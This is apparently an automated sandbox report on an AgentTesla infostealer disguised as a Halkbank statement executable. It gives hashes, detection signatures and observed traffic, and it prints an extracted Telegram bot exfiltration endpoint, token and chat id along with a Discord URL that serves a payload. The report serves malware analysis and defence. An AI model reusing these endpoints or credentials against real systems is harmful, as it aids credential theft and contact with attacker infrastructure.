Windows Analysis Report
Halkbank_Ekstre_20220513_082357_541079.exe

Overview

General Information

Sample Name: Halkbank_Ekstre_20220513_082357_541079.exe
Analysis ID: 626599
MD5: bef71f070519aad800bf09d7d5a7659b
SHA1: 2d276da3aefc56f4fa91cfaaf7e766f48f1d6140
SHA256: 969bf771ed84b11bc61cff977691a938687d043ca13b851efa7a627ef58b90b0
Tags: AgentTesla, exe, geo, Halkbank, TUR

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected MSILDownloaderGeneric
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 15.0.InstallUtil.exe.400000.4.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5388276304", "Chat URL": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument"}
Source: InstallUtil.exe.1028.15.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendMessage"}
Source: Halkbank_Ekstre_20220513_082357_541079.exe Virustotal: Detection: 34%
Source: Halkbank_Ekstre_20220513_082357_541079.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe ReversingLabs: Detection: 39%
Source: Halkbank_Ekstre_20220513_082357_541079.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Joe Sandbox ML: detected
Source: 15.0.InstallUtil.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.1.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.3.unpack Avira: Label: TR/Spy.Gen8
Source: 15.2.InstallUtil.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 15.0.InstallUtil.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49789 version: TLS 1.2
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 4x nop then jmp 06486E90h 0_2_06486A67
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_0648AA14
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 17_2_055BBD5C
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 17_2_055BBD51
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh 17_2_055BC848
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh 17_2_055BC83D
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 17_2_055BC729
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 4x nop then jmp 055B6E90h 17_2_055B6A67

Networking

Source: Yara match File source: Process Memory Space: Halkbank_Ekstre_20220513_082357_541079.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ffnbziuo.exe PID: 4600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ffnbziuo.exe PID: 4568, type: MEMORYSTR
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bfc9e9f2a6Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35c0aab288a2Host: api.telegram.orgContent-Length: 1895Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bce6fc6661Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bce7a34abcHost: api.telegram.orgContent-Length: 1895Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bceb536d8fHost: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bceb87e14bHost: api.telegram.orgContent-Length: 1895Expect: 100-continue
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: InstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 0000000F.00000002.539231225.00000000065BA000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000003.491091731.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://qguwMz.com
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ffnbziuo.exe, 00000011.00000002.529534251.00000000022CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/
Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocumentdocument-----
Source: InstallUtil.exe, 0000000F.00000002.532125758.0000000003533000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4dk
Source: InstallUtil.exe, 0000000F.00000002.532614975.0000000003581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.orgD8dkh
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.389756600.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.529463502.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com
Source: Ffnbziuo.exe, Ffnbziuo.exe, 00000012.00000002.530056532.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp
Source: Halkbank_Ekstre_20220513_082357_541079.exe, Ffnbziuo.exe.0.dr String found in binary or memory: https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp/Xcf
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 0000000F.00000002.532077311.000000000352B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.531824600.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.532228765.0000000003548000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rBRWiNLNwm.com
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown HTTP traffic detected: POST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bfc9e9f2a6Host: api.telegram.orgContent-Length: 1020Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com

System Summary

Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.0.InstallUtil.exe.400000.4.unpack, <PrivateImplementationDetails>{DC304EBF-6459-468A-8955-4284386C0374}/9BF18FEF-DDA2-4C7F-89B3-75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.0.InstallUtil.exe.400000.1.unpack, <PrivateImplementationDetails>{DC304EBF-6459-468A-8955-4284386C0374}/9BF18FEF-DDA2-4C7F-89B3-75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.0.InstallUtil.exe.400000.2.unpack, <PrivateImplementationDetails>{DC304EBF-6459-468A-8955-4284386C0374}/9BF18FEF-DDA2-4C7F-89B3-75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.0.InstallUtil.exe.400000.3.unpack, <PrivateImplementationDetails>{DC304EBF-6459-468A-8955-4284386C0374}/9BF18FEF-DDA2-4C7F-89B3-75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.2.InstallUtil.exe.400000.0.unpack, <PrivateImplementationDetails>{DC304EBF-6459-468A-8955-4284386C0374}/9BF18FEF-DDA2-4C7F-89B3-75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.0.InstallUtil.exe.400000.0.unpack, <PrivateImplementationDetails>{DC304EBF-6459-468A-8955-4284386C0374}/9BF18FEF-DDA2-4C7F-89B3-75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Halkbank_Ekstre_20220513_082357_541079.exe, type: SAMPLE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
